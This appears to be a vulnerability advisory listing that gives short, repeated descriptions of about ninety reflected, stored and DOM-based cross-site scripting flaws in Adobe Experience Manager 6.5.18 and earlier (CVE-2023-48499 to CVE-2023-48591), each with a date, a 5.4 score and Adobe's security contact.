adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48499
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48500
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48501
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48502
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48503
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48504
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48505
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48506
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48507
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48508
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48509
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48510
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48511
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48512
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48513
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48514
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48515
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48516
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48517
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48518
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48519
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48520
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48521
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48522
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48523
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48524
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48525
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48526
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48527
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48528
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48529
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48530
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48531
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48532
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48533
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48534
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48535
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48536
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48537
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48538
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48539
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48540
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48541
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48542
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48543
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48544
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48545
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48546
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48547
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48548
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48549
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48550
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48551
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48552
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48553
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48554
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48555
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48556
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48557
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48558
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48559
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48560
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48561
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48562
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48563
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48564
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48565
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48566
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48567
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48568
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48569
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48570
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48571
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48572
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48573
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48574
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48575
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48576
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48577
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48578
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48579
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48580
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48581
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48582
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48583
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48584
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48585
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48586
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48587
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48588
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48589
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48590
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48591
psirt@adobe.com
